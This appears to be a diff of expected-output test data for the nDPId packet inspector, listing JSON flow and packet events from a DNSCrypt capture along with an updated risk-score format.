 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":70,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304628,"flow_last_seen":946739304628,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739304628,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":43609,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02418{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":70,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":946739304628,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739304628,"pkt":"REREREREZmZmZmZmCABFAAXcpRkgAL0RA98KAAABKU9FDapZAbsGBIt\/BsABAAABAAAAAAABATINZG5zY3J5cHQtY2VydAJ0egRkMHduA2JpegAAEAABAAAAAAAAAAAABcQADAXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00683{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":70,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304628,"flow_last_seen":946739304628,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739304628,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":43609,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":70,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304628,"flow_last_seen":946739304628,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739304628,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":43609,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":71,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304628,"flow_last_seen":946739304628,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739304628,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":46229,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02417{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":946739304628,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739304628,"pkt":"REREREREZmZmZmZmCABFAAXcpRogAL0RA94KAAABKU9FDbSVAbsGBIFBBsIBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAJ0egRkMHduA2JpegAAEAABAAAAAAAAAAAABcQADAXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00683{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":71,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304628,"flow_last_seen":946739304628,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739304628,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":46229,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":71,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304628,"flow_last_seen":946739304628,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739304628,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":46229,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00426{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":72,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739304628,"pkt":"REREREREZmZmZmZmCABFAABQpRkAub0RKLIKAAABKU9FDQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00208{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":72,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00426{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":73,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739304628,"pkt":"REREREREZmZmZmZmCABFAABQpRoAub0RKLEKAAABKU9FDQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00208{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":73,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304628,"flow_last_seen":946739304628,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739304628,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":56043,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02417{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":946739304628,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739304628,"pkt":"REREREREZmZmZmZmCABFAAXcpRsgAL0RA90KAAABKU9FDdrrAbsGBFrpBsQBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAJ0egRkMHduA2JpegAAEAABAAAAAAAAAAAABcQADAXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00683{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":74,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304628,"flow_last_seen":946739304628,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739304628,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":56043,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":74,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304628,"flow_last_seen":946739304628,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739304628,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":56043,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":75,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304628,"flow_last_seen":946739304628,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739304628,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":38136,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01134{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":946739304628,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739304628,"pkt":"REREREREZmZmZmZmCABFAAIcpRxAAL0R55sKAAABKU9FDZT4AbsCCDEyBsMBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAJ0egRkMHduA2JpegAAEAABAAAAAAAAAAAAAcgADAHEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00679{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":75,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304628,"flow_last_seen":946739304628,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739304628,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":38136,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":75,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304628,"flow_last_seen":946739304628,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739304628,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":38136,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00426{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":76,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739304628,"pkt":"REREREREZmZmZmZmCABFAABQpRsAub0RKLAKAAABKU9FDQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00208{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":76,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":77,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304628,"flow_last_seen":946739304628,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739304628,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":56177,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01134{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":946739304628,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739304628,"pkt":"REREREREZmZmZmZmCABFAAIcpR1AAL0R55oKAAABKU9FDdtxAbsCCDEyBsEBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAJ0egRkMHduA2JpegAAEAABAAAAAAAAAAAAAcgADAHEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00679{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":77,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304628,"flow_last_seen":946739304628,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739304628,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":56177,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
